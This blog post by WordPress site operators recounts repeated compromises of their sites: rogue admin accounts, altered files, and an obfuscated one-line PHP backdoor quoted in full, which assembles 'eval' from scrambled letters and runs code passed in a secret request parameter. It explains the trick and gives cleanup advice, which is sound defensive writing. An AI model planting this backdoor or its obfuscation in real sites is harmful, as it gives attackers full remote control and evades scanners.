Our WordPress website keeps getting hacked

By , last updated June 28, 2019

We are running several websites with WordPress in different categories – everything from blogs to online shops. WordPress is great. It is easy and powerful at the same time. Although there is one thing that gives us a doubt of the platform – our WordPress websites get hacked. Especially more popular ones.

Hackers use different techniques to grant themselves illegal access. In this post will we share most recent experiences with our hacked WordPress sites.

Adding new users

One of the most obvious attacks on our blog was new users that were added to the wp-users table. They were mostly users with usernames “admin” and “administrator” and empty or unreal email-addresses. User can’t typically log in with such email addresses, so that was an obvious hack. And we’ve also disabled registrations. Here are the ones we got last time:

  • Username: admin
    Email: admin@localhost
    Password in WordPress:
    Password hash in database: b53e60a7b7977245431786c2cf03b69d
  • Username: admin92
    Email: admin@localhost
    Password in WordPress:
    Password hash in database: 771229431367b01fc178dd5f89e0b201
  • Username: administrator
    Password in WordPress:
    Password hash in database: 543678431367b01fc178dd5f89f0b403

Simply deleting these users didn’t do much – they appeared again days later.

In order to solve the problem, we changed new users rights to “Subscriber” as well as passwords and emails. Now all the data that hackers inserted into the database were updated with our data.

We aren’t sure what caused it, but it was probably a bug in a plugin or theme. The problem disappeared after a while.

Inserting code

Sometimes we see files that were changed without our consent or noticing it right away. Closer investigations show that there is seldom code we can spot right away. We often end up reinstalling all core files of WordPress just to be sure there aren’t any surprises hidden in the core files, and to remove files who are not supposed to be there. But sometimes we see changes and they are genius (and obfuscated)!

The easiest way to hack a website is to insert an eval or base64_encode functions. Once inside, the hacker can call these functions with his keys and do whatever he wants. But the problem is that everybody knows that and many protection software and plugins scan for obvious malicious software right away. Here comes the genius in people – how do you hide it?

Last time we spotted a new code it was inside the index.php within the wp-content folder (wp-content/index.php). The file is usually empty with a comment “Silence is golden”. This time it contained the following code snippet:

'v1'; $e = ' avel'; $f = create_function('', $e{3}.$e{2}.$e{1}.$e{4} .'( stripslashes( @ $_REQUEST["FFfertrNTAoTgRLOacet"] ) );' ); $f();

The line was inserted while we tested some new plugins on our beta-website that is actually CLOSED from the outside world by .htaccess directives. Could any of the plugins insert the code? Maybe. No inspections of the involved plugins yielded any results. It could be anything.

If you look at this code – it is actually rather good:

  1. It creates a variable with the string ” avel”
  2. It then creates a function by taking letters from the variable “avel” in an order: 3-2-1-4 – “eval”
  3. When the hacker calls the file with the key FFfertrNTAoTgRLOacet, the hacker has complete access to the site. At that point any passwords (user accounts, and database) are compromised and needs to be changed. Also the database contents is not safe. The contents may have been inserted hidden back links and possibly back doors in the post contents.

As it is explained here, scanning such code with antivirus software won’t give you any warnings.

Adding new files

We discover new files in our WordPress installations approximately once a year. They often get added without us noticing. Using file version system like Git and exploring all new changes from time to time helps spot the problem early.

The only thing to do when you see new files – reinstall WordPress. Get the newest version. Remove all unnecessary plugins. Inspect thoroughly all your own files for changes around the time your website was hacked, and inspect the log from around the time the file was modified.

We will update if we’re hacked again.

About 6 month ago we have decided to try out Wordfence plugin for WordPress. It worked well for our blog type of website, but the plugin slowed horribly down our eCommerce stores with a lot of images.